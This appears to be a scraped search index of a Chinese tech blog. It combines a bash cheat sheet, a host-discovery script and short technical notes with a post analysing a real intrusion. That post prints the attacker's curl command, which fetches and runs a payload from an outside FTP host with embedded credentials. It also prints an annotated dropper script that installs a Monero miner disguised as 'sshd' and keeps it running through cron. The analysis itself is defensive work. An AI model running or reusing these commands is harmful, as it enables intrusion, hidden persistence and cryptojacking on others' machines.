${VAR:-STRING} If VAR is empty or unset, use STRING as its value. ${VAR-STRING} If VAR is unset, use STRING as its value. ${VAR:=STRING} If VAR is empty or unset, set the value of VAR to STRING. ${VAR=STRING} If VAR is unset, set the value of VAR to STRING. ${VAR:+STRING} If VAR is not empty, use STRING as its value. ${VAR+STRING} If VAR is set, use STRING as its value. ${VAR:?STRING} Display an error if empty or unset. ${VAR?STRING} Display an error if unset. 大括号展开 范围 # Syntax: {\u0026lt;START\u0026gt;..\u0026lt;END\u0026gt;} # Print numbers 1-100. echo {1..100} # Print range of floats. echo 1.{1..9} # Print chars a-z. echo {a..z} echo {A..Z} # Nesting. echo {A..Z}{0..9} # Print zero-padded numbers. # CAVEAT: bash 4+ echo {01..100} # Change increment amount. # Syntax: {\u0026lt;START\u0026gt;..\u0026lt;END\u0026gt;..\u0026lt;INCREMENT\u0026gt;} # CAVEAT: bash 4+ echo {1..10..2} # Increment by 2. 字符串列表 echo {apples,oranges,pears,grapes} # Example Usage: # Remove dirs Movies, Music and ISOS from ~/Downloads/. rm -rf ~/Downloads/{Movies,Music,ISOS} 条件表达式 文件条件判断 Expression Value What does it do? -a file If file exists. -b file If file exists and is a block special file. -c file If file exists and is a character special file. -d file If file exists and is a directory. -e file If file exists. -f file If file exists and is a regular file. -g file If file exists and its set-group-id bit is set. -h file If file exists and is a symbolic link. -k file If file exists and its sticky-bit is set -p file If file exists and is a named pipe (FIFO). -r file If file exists and is readable. -s file If file exists and its size is greater than zero. -t fd If file descriptor is open and refers to a terminal. -u file If file exists and its set-user-id bit is set. -w file If file exists and is writable. -x file If file exists and is executable. -G file If file exists and is owned by the effective group ID. -L file If file exists and is a symbolic link. 
-N file If file exists and has been modified since last read. -O file If file exists and is owned by the effective user ID. -S file If file exists and is a socket. 文件比较 Expression What does it do? file -ef file2 If both files refer to the same inode and device numbers. file -nt file2 If file is newer than file2 (uses modification time) or file exists and file2 does not. file -ot file2 If file is older than file2 (uses modification time) or file2 exists and file does not. 变量测试 Expression Value What does it do? -o opt If shell option is enabled. -v var If variable has a value assigned. -R var If variable is a name reference. -z var If the length of string is zero. -n var If the length of string is non-zero. 变量比较 Expression What does it do? var = var2 Equal to. var == var2 Equal to (synonym for =). var != var2 Not equal to. var \u0026lt; var2 Less than (in ASCII alphabetical order.) var \u0026gt; var2 Greater than (in ASCII alphabetical order.) 算数操作 赋值 Operators What does it do? = Initialize or change the value of a variable. 算数 Operators What does it do? + Addition - Subtraction * Multiplication / Division ** Exponentiation % Modulo += Plus-Equal (Increment a variable.) -= Minus-Equal (Decrement a variable.) *= Times-Equal (Multiply a variable.) /= Slash-Equal (Divide a variable.) %= Mod-Equal (Remainder of dividing a variable.) 位操作 Operators What does it do? \u0026lt;\u0026lt; Bitwise Left Shift \u0026lt;\u0026lt;= Left-Shift-Equal \u0026gt;\u0026gt; Bitwise Right Shift \u0026gt;\u0026gt;= Right-Shift-Equal \u0026amp; Bitwise AND \u0026amp;= Bitwise AND-Equal | Bitwise OR |= Bitwise OR-Equal ~ Bitwise NOT ^ Bitwise XOR ^= Bitwise XOR-Equal 逻辑 Operators What does it do? ! NOT \u0026amp;\u0026amp; AND || OR Miscellaneous Operators What does it do? 
Example , Comma Separator ((a=1,b=2,c=3)) ARITHMETIC Simpler syntax to set variables # Simple math ((var=1+2)) # Decrement/Increment variable ((var++)) ((var--)) ((var+=1)) ((var-=1)) # Using variables ((var=var2*arr[2])) Ternary Tests # Set the value of var to var2 if var2 is greater than var. # var: variable to set. # var2\u0026gt;var: Condition to test. # ?var2: If the test succeeds. # :var: If the test fails. ((var=var2\u0026gt;var?var2:var)) TRAPS Traps allow a script to execute code on various signals. In pxltrm (a pixel art editor written in bash) traps are used to redraw the user interface on window resize. Another use case is cleaning up temporary files on script exit.\nTraps should be added near the start of scripts so any early errors are also caught.\nNOTE: For a full list of signals, see trap -l.\nDo something on script exit # Clear screen on script exit. trap \u0026#39;printf \\\\e[2J\\\\e[H\\\\e[m\u0026#39; EXIT Ignore terminal interrupt (CTRL+C, SIGINT) trap \u0026#39;\u0026#39; INT React to window resize # Call a function on window resize. trap \u0026#39;code_here\u0026#39; SIGWINCH Do something before every command trap \u0026#39;code_here\u0026#39; DEBUG Do something when a shell function or a sourced file finishes executing trap \u0026#39;code_here\u0026#39; RETURN PERFORMANCE Disable Unicode If unicode is not required, it can be disabled for a performance increase. Results may vary however there have been noticeable improvements in neofetch and other programs.\n# Disable unicode. LC_ALL=C LANG=C OBSOLETE SYNTAX Shebang Use #!/usr/bin/env bash instead of #!/bin/bash.\nThe former searches the user\u0026rsquo;s PATH to find the bash binary. The latter assumes it is always installed to /bin/ which can cause issues. NOTE: There are times when one may have a good reason for using #!/bin/bash or another direct path to the binary.\n# Right: #!/usr/bin/env bash # Less right: #!/bin/bash Command Substitution Use $() instead of backticks.\n# Right. 
var=\u0026#34;$(command)\u0026#34; # Wrong. var=`command` # $() can easily be nested whereas `` cannot. var=\u0026#34;$(command \u0026#34;$(command)\u0026#34;)\u0026#34; Function Declaration Do not use the function keyword, it reduces compatibility with older versions of bash.\n# Right. do_something() { # ... } # Wrong. function do_something() { # ... } INTERNAL VARIABLES Get the location to the bash binary \u0026#34;$BASH\u0026#34; Get the version of the current running bash process # As a string. \u0026#34;$BASH_VERSION\u0026#34; # As an array. \u0026#34;${BASH_VERSINFO[@]}\u0026#34; Open the user\u0026rsquo;s preferred text editor \u0026#34;$EDITOR\u0026#34; \u0026#34;$file\u0026#34; # NOTE: This variable may be empty, set a fallback value. \u0026#34;${EDITOR:-vi}\u0026#34; \u0026#34;$file\u0026#34; Get the name of the current function # Current function. \u0026#34;${FUNCNAME[0]}\u0026#34; # Parent function. \u0026#34;${FUNCNAME[1]}\u0026#34; # So on and so forth. \u0026#34;${FUNCNAME[2]}\u0026#34; \u0026#34;${FUNCNAME[3]}\u0026#34; # All functions including parents. \u0026#34;${FUNCNAME[@]}\u0026#34; Get the host-name of the system \u0026#34;$HOSTNAME\u0026#34; # NOTE: This variable may be empty. # Optionally set a fallback to the hostname command. \u0026#34;${HOSTNAME:-$(hostname)}\u0026#34; Get the architecture of the Operating System \u0026#34;$HOSTTYPE\u0026#34; Get the name of the Operating System / Kernel This can be used to add conditional support for different OperatingSystems without needing to call uname.\n\u0026#34;$OSTYPE\u0026#34; Get the current working directory This is an alternative to the pwd built-in.\n\u0026#34;$PWD\u0026#34; Get the number of seconds the script has been running \u0026#34;$SECONDS\u0026#34; Get a pseudorandom integer Each time $RANDOM is used, a different integer between 0 and 32767 is returned. 
This variable should not be used for anything related to security (this includes encryption keys etc).\n\u0026#34;$RANDOM\u0026#34; INFORMATION ABOUT THE TERMINAL Get the terminal size in lines and columns (from a script) This is handy when writing scripts in pure bash and stty/tput can’t be called.\nExample Function:\nget_term_size() { # Usage: get_term_size # (:;:) is a micro sleep to ensure the variables are # exported immediately. shopt -s checkwinsize; (:;:) printf \u0026#39;%s\\n\u0026#39; \u0026#34;$LINES $COLUMNS\u0026#34; } Example Usage:\n# Output: LINES COLUMNS $ get_term_size 15 55 Get the terminal size in pixels CAVEAT: This does not work in some terminal emulators.\nExample Function:\nget_window_size() { # Usage: get_window_size printf \u0026#39;%b\u0026#39; \u0026#34;${TMUX:+\\\\ePtmux;\\\\e}\\\\e[14t${TMUX:+\\\\e\\\\\\\\}\u0026#34; IFS=\u0026#39;;t\u0026#39; read -d t -t 0.05 -sra term_size printf \u0026#39;%s\\n\u0026#39; \u0026#34;${term_size[1]}x${term_size[2]}\u0026#34; } Example Usage:\n# Output: WIDTHxHEIGHT $ get_window_size 1200x800 # Output (fail): $ get_window_size x Get the current cursor position This is useful when creating a TUI in pure bash.\nExample Function:\nget_cursor_pos() { # Usage: get_cursor_pos IFS=\u0026#39;[;\u0026#39; read -p $\u0026#39;\\e[6n\u0026#39; -d R -rs _ y x _ printf \u0026#39;%s\\n\u0026#39; \u0026#34;$x $y\u0026#34; } Example Usage:\n# Output: X Y $ get_cursor_pos 1 8 CONVERSION Convert a hex color to RGB Example Function:\nhex_to_rgb() { # Usage: hex_to_rgb \u0026#34;#FFFFFF\u0026#34; # hex_to_rgb \u0026#34;000000\u0026#34; : \u0026#34;${1/\\#}\u0026#34; ((r=16#${_:0:2},g=16#${_:2:2},b=16#${_:4:2})) printf \u0026#39;%s\\n\u0026#39; \u0026#34;$r $g $b\u0026#34; } Example Usage:\n$ hex_to_rgb \u0026#34;#FFFFFF\u0026#34; 255 255 255 Convert an RGB color to hex Example Function:\nrgb_to_hex() { # Usage: rgb_to_hex \u0026#34;r\u0026#34; \u0026#34;g\u0026#34; \u0026#34;b\u0026#34; printf 
\u0026#39;#%02x%02x%02x\\n\u0026#39; \u0026#34;$1\u0026#34; \u0026#34;$2\u0026#34; \u0026#34;$3\u0026#34; } Example Usage:\n$ rgb_to_hex \u0026#34;255\u0026#34; \u0026#34;255\u0026#34; \u0026#34;255\u0026#34; #FFFFFF CODE GOLF Shorter for loop syntax # Tiny C Style. for((;i++\u0026lt;10;)){ echo \u0026#34;$i\u0026#34;;} # Undocumented method. for i in {1..10};{ echo \u0026#34;$i\u0026#34;;} # Expansion. for i in {1..10}; do echo \u0026#34;$i\u0026#34;; done # C Style. for((i=0;i\u0026lt;=10;i++)); do echo \u0026#34;$i\u0026#34;; done Shorter infinite loops # Normal method while :; do echo hi; done # Shorter for((;;)){ echo hi;} Shorter function declaration # Normal method f(){ echo hi;} # Using a subshell f()(echo hi) # Using arithmetic # This can be used to assign integer values. # Example: f a=1 # f a++ f()(($1)) # Using tests, loops etc. # NOTE: ‘while’, ‘until’, ‘case’, ‘(())’, ‘[[]]’ can also be used. f()if true; then echo \u0026#34;$1\u0026#34;; fi f()for i in \u0026#34;$@\u0026#34;; do echo \u0026#34;$i\u0026#34;; done Shorter if syntax # One line # Note: The 3rd statement may run when the 1st is true [[ $var == hello ]] \u0026amp;\u0026amp; echo hi || echo bye [[ $var == hello ]] \u0026amp;\u0026amp; { echo hi; echo there; } || echo bye # Multi line (no else, single statement) # Note: The exit status may not be the same as with an if statement [[ $var == hello ]] \u0026amp;\u0026amp; echo hi # Multi line (no else) [[ $var == hello ]] \u0026amp;\u0026amp; { echo hi # ... } Simpler case statement to set variable The : built-in can be used to avoid repeating variable= in a case statement. The $_ variable stores the last argument of the last command. : always succeeds so it can be used to store the variable value.\n# Modified snippet from Neofetch. 
case \u0026#34;$OSTYPE\u0026#34; in \u0026#34;darwin\u0026#34;*) : \u0026#34;MacOS\u0026#34; ;; \u0026#34;linux\u0026#34;*) : \u0026#34;Linux\u0026#34; ;; *\u0026#34;bsd\u0026#34;* | \u0026#34;dragonfly\u0026#34; | \u0026#34;bitrig\u0026#34;) : \u0026#34;BSD\u0026#34; ;; \u0026#34;cygwin\u0026#34; | \u0026#34;msys\u0026#34; | \u0026#34;win32\u0026#34;) : \u0026#34;Windows\u0026#34; ;; *) printf \u0026#39;%s\\n\u0026#39; \u0026#34;Unknown OS detected, aborting...\u0026#34; \u0026gt;\u0026amp;2 exit 1 ;; esac # Finally, set the variable. os=\u0026#34;$_\u0026#34; OTHER Use read as an alternative to the sleep command Surprisingly, sleep is an external command and not a bash built-in.\nCAVEAT: Requires bash 4+\nExample Function:\nread_sleep() { # Usage: read_sleep 1 # read_sleep 0.2 read -rt \u0026#34;$1\u0026#34; \u0026lt;\u0026gt; \u0026lt;(:) || : } Example Usage:\nread_sleep 1 read_sleep 0.1 read_sleep 30 For performance-critical situations, where it is not economic to open and close an excessive number of file descriptors, the allocation of a file descriptor may be done only once for all invocations of read:\n(See the generic original implementation at https://blog.dhampir.no/content/sleeping-without-a-subprocess-in-bash-and-how-to-sleep-forever)\nexec {sleep_fd}\u0026lt;\u0026gt; \u0026lt;(:) while some_quick_test; do # equivalent of sleep 0.001 read -t 0.001 -u $sleep_fd done Check if a program is in the user\u0026rsquo;s PATH # There are 3 ways to do this and either one can be used. type -p executable_name \u0026amp;\u0026gt;/dev/null hash executable_name \u0026amp;\u0026gt;/dev/null command -v executable_name \u0026amp;\u0026gt;/dev/null # As a test. if type -p executable_name \u0026amp;\u0026gt;/dev/null; then # Program is in PATH. fi # Inverse. if ! type -p executable_name \u0026amp;\u0026gt;/dev/null; then # Program is not in PATH. fi # Example (Exit early if program is not installed). if ! 
type -p convert \u0026amp;\u0026gt;/dev/null; then printf \u0026#39;%s\\n\u0026#39; \u0026#34;error: convert is not installed, exiting...\u0026#34; exit 1 fi Get the current date using strftime Bash’s printf has a built-in method of getting the date which can be used in place of the date command.\nCAVEAT: Requires bash 4+\nExample Function:\ndate() { # Usage: date \u0026#34;format\u0026#34; # See: \u0026#39;man strftime\u0026#39; for format. printf \u0026#34;%($1)T\\\\n\u0026#34; \u0026#34;-1\u0026#34; } Example Usage:\n# Using above function. $ date \u0026#34;%a %d %b - %l:%M %p\u0026#34; Fri 15 Jun - 10:00 AM # Using printf directly. $ printf \u0026#39;%(%a %d %b - %l:%M %p)T\\n\u0026#39; \u0026#34;-1\u0026#34; Fri 15 Jun - 10:00 AM # Assigning a variable using printf. $ printf -v date \u0026#39;%(%a %d %b - %l:%M %p)T\\n\u0026#39; \u0026#39;-1\u0026#39; $ printf \u0026#39;%s\\n\u0026#39; \u0026#34;$date\u0026#34; Fri 15 Jun - 10:00 AM Get the username of the current user CAVEAT: Requires bash 4.4+\n$ : \\\\u # Expand the parameter as if it were a prompt string. 
$ printf \u0026#39;%s\\n\u0026#39; \u0026#34;${_@P}\u0026#34; black Generate a UUID V4 CAVEAT: The generated value is not cryptographically secure.\nExample Function:\nuuid() { # Usage: uuid C=\u0026#34;89ab\u0026#34; for ((N=0;N\u0026lt;16;++N)); do B=\u0026#34;$((RANDOM%256))\u0026#34; case \u0026#34;$N\u0026#34; in 6) printf \u0026#39;4%x\u0026#39; \u0026#34;$((B%16))\u0026#34; ;; 8) printf \u0026#39;%c%x\u0026#39; \u0026#34;${C:$RANDOM%${#C}:1}\u0026#34; \u0026#34;$((B%16))\u0026#34; ;; 3|5|7|9) printf \u0026#39;%02x-\u0026#39; \u0026#34;$B\u0026#34; ;; *) printf \u0026#39;%02x\u0026#39; \u0026#34;$B\u0026#34; ;; esac done printf \u0026#39;\\n\u0026#39; } Example Usage:\n$ uuid d5b6c731-1310-4c24-9fe3-55d556d44374 Progress bars This is a simple way of drawing progress bars without needing a for loop in the function itself.\nExample Function:\nbar() { # Usage: bar 1 10 # ^----- Elapsed Percentage (0-100). # ^-- Total length in chars. ((elapsed=$1*$2/100)) # Create the bar with spaces. printf -v prog \u0026#34;%${elapsed}s\u0026#34; printf -v total \u0026#34;%$(($2-elapsed))s\u0026#34; printf \u0026#39;%s\\r\u0026#39; \u0026#34;[${prog// /-}${total}]\u0026#34; } Example Usage:\nfor ((i=0;i\u0026lt;=100;i++)); do # Pure bash micro sleeps (for the example). (:;:) \u0026amp;\u0026amp; (:;:) \u0026amp;\u0026amp; (:;:) \u0026amp;\u0026amp; (:;:) \u0026amp;\u0026amp; (:;:) # Print the bar. 
bar \u0026#34;$i\u0026#34; \u0026#34;10\u0026#34; done printf \u0026#39;\\n\u0026#39; Get the list of functions in a script get_functions() { # Usage: get_functions IFS=$\u0026#39;\\n\u0026#39; read -d \u0026#34;\u0026#34; -ra functions \u0026lt; \u0026lt;(declare -F) printf \u0026#39;%s\\n\u0026#39; \u0026#34;${functions[@]//declare -f }\u0026#34; } Bypass shell aliases # alias ls # command # shellcheck disable=SC1001 \\ls Bypass shell functions # function ls # command command ls 后台运行命令 This will run the given command and keep it running, even after the terminal or SSH connection is terminated. All output is ignored.\nbkr() { (nohup \u0026#34;$@\u0026#34; \u0026amp;\u0026gt;/dev/null \u0026amp;) } bkr ./some_script.sh # some_script.sh is now running in the background AFTERWORD Thanks for reading! If this bible helped you in any way and you\u0026rsquo;d like to give back, consider donating. Donations give me the time to make this the best resource possible. Can\u0026rsquo;t donate? That\u0026rsquo;s OK, star the repo and share it with your friends!\n","permalink":"https://wdd.js.org/shell/pure-bash-bible/","summary":"字符串 字符串包含 Using a test:\nif [[ $var == *sub_string* ]]; then printf \u0026#39;%s\\n\u0026#39; \u0026#34;sub_string is in var.\u0026#34; fi # Inverse (substring not in string). if [[ $var != *sub_string* ]]; then printf \u0026#39;%s\\n\u0026#39; \u0026#34;sub_string is not in var.\u0026#34; fi # This works for arrays too! 
if [[ ${arr[*]} == *sub_string* ]]; then printf \u0026#39;%s\\n\u0026#39; \u0026#34;sub_string is in array.\u0026#34; fi Using a case statement:\ncase \u0026#34;$var\u0026#34; in *sub_string*) # Do stuff ;; *sub_string2*) # Do more stuff ;; *) # Else ;; esac 字符串开始 if [[ $var == sub_string* ]]; then printf \u0026#39;%s\\n\u0026#39; \u0026#34;var starts with sub_string.","title":"pure-bash-bible"},{"content":"使用 ping 优点 原生,不用安装软件 缺点 速度慢 下面的脚本列出 192.168.1.0/24 的所有主机,大概需要 255 秒\n#!/bin/bash function handler () { echo \u0026#34;will exit\u0026#34; exit 0 } trap \u0026#39;handler\u0026#39; SIGINT for ip in 192.168.1.{1..255} do ping -W 1 -c 1 $ip \u0026amp;\u0026gt; /dev/null if [ $? -eq 0 ]; then echo $ip is alive else echo $ip is dead fi done 使用 fping 优点 速度快 缺点 需要安装 fping # 安装fping brew install fping # mac yum install fping # centos apt install fping # debian 我用的 fping 是 MacOS X, fping 的版本是 4.2\n用 fping 去执行,同样 256 个主机,只需要 5-6s\nfping -g 192.168.1.0/24 -r 1 -a -s ","permalink":"https://wdd.js.org/shell/list-active-host/","summary":"使用 ping 优点 原生,不用安装软件 缺点 速度慢 下面的脚本列出 192.168.1.0/24 的所有主机,大概需要 255 秒\n#!/bin/bash function handler () { echo \u0026#34;will exit\u0026#34; exit 0 } trap \u0026#39;handler\u0026#39; SIGINT for ip in 192.168.1.{1..255} do ping -W 1 -c 1 $ip \u0026amp;\u0026gt; /dev/null if [ $? 
-eq 0 ]; then echo $ip is alive else echo $ip is dead fi done 使用 fping 优点 速度快 缺点 需要安装 fping # 安装fping brew install fping # mac yum install fping # centos apt install fping # debian 我用的 fping 是 MacOS X, fping 的版本是 4.","title":"列出网络中活动的主机"},{"content":"机器被入侵了,写点东西,分析一下入侵脚本,顺便也学习一下。\nbash -c curl -O ftp://noji:noji2012@153.122.137.67/.kde/sshd.tgz;tar xvf sshd.tgz;rm -rf sshd.tgz;cd .ssd;chmod +x *;./go -r 下载恶意软件 恶意软件的是使用 ftp 下载的, 地址是:ftp://noji:noji2012@153.122.137.67/.kde/sshd.tgz,这个 153.122.137.67 IP 是位于日本东京,ssd.taz 是一个 tar 包,用 tar 解压之后,出现一个 sh 文件,两个可执行文件。\n-rwxr-xr-x 1 1001 1001 907 Nov 20 20:58 go # shell -rwxrwxr-x 1 1001 1001 1.3M Nov 20 21:06 i686 # 可执行 -rwxrwxr-x 1 1001 1001 1.1M Nov 20 21:06 x86_64 # 可执行 分析可执行文件 go go 是一个 shell 程序,下文是分析\n#!/bin/bash # pool.supportxmr.com门罗币的矿池 # 所以大家应该清楚了,入侵的机器应该用来挖矿的 # 这一步是测试本机与矿池dns是否通 if [ $(ping -c 1 pool.supportxmr.com 2\u0026gt;/dev/null|grep \u0026#34;bytes of data\u0026#34; | wc -l ) -gt \u0026#39;0\u0026#39; ]; then dns=\u0026#34;\u0026#34; # dns通 else dns=\u0026#34;-d\u0026#34; # dns不通 fi # 删除用户计划任务,并将报错信息清除 crontab -r 2\u0026gt;/dev/null # 这一步不太懂 rm -rf /tmp/.lock 2\u0026gt;/dev/null # 设置当前进程的名字,为了掩人耳目,起个sshd, 鱼目混珠 EXEC=\u0026#34;sshd\u0026#34; # 获取当前目录 DIR=`pwd` # 获取参数个数 # 这个程序传了一个 -r 参数,所以$#的值是1 if [ \u0026#34;$#\u0026#34; == \u0026#34;0\u0026#34; ];\tthen ARGS=\u0026#34;\u0026#34; else # 遍历每一个参数 for var in \u0026#34;$@\u0026#34; do if [ \u0026#34;$var\u0026#34; != \u0026#34;-f\u0026#34; ];\tthen ARGS=\u0026#34;$ARGS $var\u0026#34; # $var不是-f, 所以ARGS被这是为-r fi if [ ! -z \u0026#34;$FAKEPROC\u0026#34; ];\tthen FAKEPROC=$((FAKEPROC+1)) # 这里不会执行,因为$FAKEPROC是空字符串 fi if [ \u0026#34;$var\u0026#34; == \u0026#34;-h\u0026#34; ];\tthen FAKEPROC=\u0026#34;1\u0026#34; # 这里也不会执行 fi if [[ \u0026#34;$FAKEPROC\u0026#34; == \u0026#34;2\u0026#34; ]];\tthen EXEC=\u0026#34;$var\u0026#34; # 这里也不会执行 fi if [ ! 
-z \u0026#34;$dns\u0026#34; ];\tthen ARGS=\u0026#34;$ARGS $dns\u0026#34; # 如果本机与矿池dns通,则这里不会执行 fi done fi # 创建目录 mkdir -- \u0026#34;.$EXEC\u0026#34; #创建 .sshd目录 cp -f -- `uname -m` \u0026#34;.$EXEC\u0026#34;/\u0026#34;$EXEC\u0026#34; # uname -m获取系统架构,然后判断要把i686还是x86_64拷贝到.sshd目录, 并重命名为sshd ./\u0026#34;.$EXEC\u0026#34;/\u0026#34;$EXEC\u0026#34; $ARGS -f -c # 执行改名后的文件 rm -rf \u0026#34;.$EXEC\u0026#34; # 生成后续执行的脚本 echo \u0026#34;#!/bin/bash cd -- $DIR mkdir -- .$EXEC cp -f -- `uname -m` .$EXEC/$EXEC ./.$EXEC/$EXEC $ARGS -c rm -rf .$EXEC\u0026#34; \u0026gt; \u0026#34;$EXEC\u0026#34; chmod +x -- \u0026#34;$EXEC\u0026#34; # 执行脚本 ./\u0026#34;$EXEC\u0026#34; # 生成计划任务执行脚本 (echo \u0026#34;* * * * * `pwd`/$EXEC\u0026#34;) | sort - | uniq - | crontab - # 删除go脚本 rm -rf go 上文的脚本中,有许多命令后跟着 -- 和 - 这两个参数都是 bash 脚本的内置参数,用来标记命令的内置参数已经结束。\n由于 x86_64 和 i686 是可执行文件,就不分析了。\n恶意文件清除 清除 crontab 定时任务 清除可执行文件。可以 ll /proc/pid/exe , 看下恶意进程的可执行文件位置 kill 恶意程序的进程 修改 root 密码 如何防护 使用强密码,至少 32 位 使用 ssh key 登录 有些脚本会把名字伪装成系统服务,所以不要被进程的名字迷惑,而应该看看这个进程使用的资源是否合理。一个 sshd 的进程,正常来说占用 cpu 和内存不会超过 1%。如果你发现一个占用 CPU%的 sshd 进程,你就要小心这东西是不是滥竽充数了。 ","permalink":"https://wdd.js.org/shell/evil-script/","summary":"机器被入侵了,写点东西,分析一下入侵脚本,顺便也学习一下。\nbash -c curl -O ftp://noji:noji2012@153.122.137.67/.kde/sshd.tgz;tar xvf sshd.tgz;rm -rf sshd.tgz;cd .ssd;chmod +x *;./go -r 下载恶意软件 恶意软件的是使用 ftp 下载的, 地址是:ftp://noji:noji2012@153.122.137.67/.kde/sshd.tgz,这个 153.122.137.67 IP 是位于日本东京,ssd.taz 是一个 tar 包,用 tar 解压之后,出现一个 sh 文件,两个可执行文件。\n-rwxr-xr-x 1 1001 1001 907 Nov 20 20:58 go # shell -rwxrwxr-x 1 1001 1001 1.3M Nov 20 21:06 i686 # 可执行 -rwxrwxr-x 1 1001 1001 1.1M Nov 20 21:06 x86_64 # 可执行 分析可执行文件 go go 是一个 shell 程序,下文是分析\n#!/bin/bash # pool.","title":"入侵脚本分析 - 瞒天过海"},{"content":"","permalink":"https://wdd.js.org/posts/2019/12/drkxqu/","summary":"","title":"进程实战"},{"content":"","permalink":"https://wdd.js.org/posts/2019/12/caytlk/","summary":"","title":"docker slim"},{"content":"路由器无线网络的模式有11b only ,11g only, 11n only,11bg mixed,11bgn 
mixed\n11b:就是11M 11g:就是54M 11n:就是150M或者300M only:在此模式下,频道仅使用 802.11b标准mixed:支持混合 802.11b 和 802.11g 装置\n修改路由器工作模式后,手机连接wifi,然后用腾讯手机管家对WiFi测速\n工作模式 下载速度 11b 200kb/s 11g 400kb/s 11n 1.1MB/s 11bgn mixed 2.06MB/s 所以,选择11bgn是个不错的选择。\n","permalink":"https://wdd.js.org/posts/2019/12/mgyw98/","summary":"路由器无线网络的模式有11b only ,11g only, 11n only,11bg mixed,11bgn mixed\n11b:就是11M 11g:就是54M 11n:就是150M或者300M only:在此模式下,频道仅使用 802.11b标准mixed:支持混合 802.11b 和 802.11g 装置\n修改路由器工作模式后,手机连接wifi,然后用腾讯手机管家对WiFi测速\n工作模式 下载速度 11b 200kb/s 11g 400kb/s 11n 1.1MB/s 11bgn mixed 2.06MB/s 所以,选择11bgn是个不错的选择。","title":"wifi工作模式测试"},{"content":"var data = [] var t1 = [ [\u0026#34;2019-12-11T09:13:06.078545239Z\u0026#34;,153], [\u0026#34;2019-12-11T09:14:06.087484224Z\u0026#34;,118], [\u0026#34;2019-12-11T09:15:07.723571286Z\u0026#34;,198], [\u0026#34;2019-12-11T09:16:09.534879791Z\u0026#34;,249], ] var t2 = [ [\u0026#34;2019-12-11T09:13:06Z\u0026#34;,153], [\u0026#34;2019-12-11T09:14:06Z\u0026#34;,118], [\u0026#34;2019-12-11T09:15:07Z\u0026#34;,198], [\u0026#34;2019-12-11T09:16:09Z\u0026#34;,249], ] var data = t1.map(function(item){ return { value: [item[0], item[1]] } }) option = { title: { text: \u0026#39;动态数据 + 时间坐标轴\u0026#39; }, tooltip: { trigger: \u0026#39;axis\u0026#39; }, xAxis: { type: \u0026#39;time\u0026#39; }, yAxis: { type: \u0026#39;value\u0026#39; }, series: [{ name: \u0026#39;模拟数据\u0026#39;, type: \u0026#39;line\u0026#39;, showSymbol: false, hoverAnimation: false, data: data }] }; 数据集t1时间精度到秒,并且带9位小数 数据集t2时间精确到秒,不带小数 t1的绘线出现往回拐,明显有问题。不知道这是不是echarts的bug\n解决方案:查询时设置epoch=s, 用unix秒数来格式化时间\n","permalink":"https://wdd.js.org/posts/2019/12/nolg61/","summary":"var data = [] var t1 = [ [\u0026#34;2019-12-11T09:13:06.078545239Z\u0026#34;,153], [\u0026#34;2019-12-11T09:14:06.087484224Z\u0026#34;,118], [\u0026#34;2019-12-11T09:15:07.723571286Z\u0026#34;,198], [\u0026#34;2019-12-11T09:16:09.534879791Z\u0026#34;,249], ] var t2 = [ [\u0026#34;2019-12-11T09:13:06Z\u0026#34;,153], 
[\u0026#34;2019-12-11T09:14:06Z\u0026#34;,118], [\u0026#34;2019-12-11T09:15:07Z\u0026#34;,198], [\u0026#34;2019-12-11T09:16:09Z\u0026#34;,249], ] var data = t1.map(function(item){ return { value: [item[0], item[1]] } }) option = { title: { text: \u0026#39;动态数据 + 时间坐标轴\u0026#39; }, tooltip: { trigger: \u0026#39;axis\u0026#39; }, xAxis: { type: \u0026#39;time\u0026#39; }, yAxis: { type: \u0026#39;value\u0026#39; }, series: [{ name: \u0026#39;模拟数据\u0026#39;, type: \u0026#39;line\u0026#39;, showSymbol: false, hoverAnimation: false, data: data }] }; 数据集t1时间精度到秒,并且带9位小数 数据集t2时间精确到秒,不带小数 t1的绘线出现往回拐,明显有问题。不知道这是不是echarts的bug","title":"influxdb时间精度到秒"},{"content":"\nAbout Channel variables are used to manipulate dialplan execution, to control call progress, and to provide options to applications. They play a pervasive role, as FreeSWITCH™ frequently consults channel variables as a way to customize processing prior to a channel\u0026rsquo;s creation, during call progress, and after the channel hangs up. Variable Expansion We rely on variable expansion to create flexible, reusable dialplans:\n$${variable} is expanded once when FreeSWITCH™ first parses the configuration on startup or after invoking reloadxml. It is suitable for variables that do not change, such as the domain of a single-tenant FreeSWITCH™ server. That is why $${domain} is referenced so frequently in the vanilla dialplan examples. ${variable} is expanded during each pass through the dialplan, so it is used for variables that are expected to change, such as the ${destination_number} or ${sip_to_user} fields. 
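The difference between the two expansion forms can be sketched in a small dialplan fragment (the extension name and log messages below are illustrative, not taken from the FreeSWITCH documentation):

```xml
<!-- Sketch only: "expansion-demo" is a made-up extension name. -->
<extension name="expansion-demo">
  <condition field="destination_number" expression="^(\d+)$">
    <!-- $${domain} was substituted once, when the XML was parsed. -->
    <action application="log" data="INFO static domain: $${domain}"/>
    <!-- ${destination_number} is re-evaluated on every call. -->
    <action application="log" data="INFO dialed number: ${destination_number}"/>
  </condition>
</extension>
```

If the value behind a $${...} reference changes on disk, it is only picked up after the XML is parsed again, e.g. by invoking reloadxml.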
Channel Variables in the XML Dialplan Channel variables are set, appropriately enough, with the set application:\n\u0026lt;action application=\u0026ldquo;set\u0026rdquo; data=\u0026ldquo;var_name=var value\u0026rdquo;/\u0026gt; Reading channel variables requires the ${} syntax:\n\u0026lt;action application=\u0026ldquo;log\u0026rdquo; data=\u0026ldquo;INFO The value in the var_name chan var is ${var_name}\u0026rdquo;/\u0026gt;\u0026lt;condition field=\u0026quot;${var_name}\u0026quot; expression=\u0026ldquo;some text\u0026rdquo;\u0026gt; Scoped Variables Channel variables used to be global to the session. As of b2c3199f, it is possible to set variables that only exist within a single application execution and any subsequent applications under it. For example, applications can use scoped variables for named input params:\n\u0026lt;action application=\u0026ldquo;log\u0026rdquo; data=\u0026ldquo;INFO myvar is \u0026lsquo;${myvar}\u0026rsquo;\u0026rdquo;/\u0026gt;\u0026lt;action application=\u0026ldquo;log\u0026rdquo; data=\u0026quot;%[myvar=Hello]INFO myvar is \u0026lsquo;${myvar}\u0026rsquo;\u0026quot;/\u0026gt;\u0026lt;action application=\u0026ldquo;log\u0026rdquo; data=\u0026ldquo;INFO myvar is \u0026lsquo;${myvar}\u0026rsquo;\u0026rdquo;/\u0026gt;\u0026lt;action application=\u0026ldquo;myapp\u0026rdquo; data=\u0026quot;%[var1=val1,var2=val2]mydata\u0026quot;/\u0026gt; Channel Variables in Dial Strings The variable assignment syntax for dial strings differs depending on which scope they should apply to:\n{foo=bar} is only valid at the beginning of the dial string. It will set the same variables on every channel, but does not do 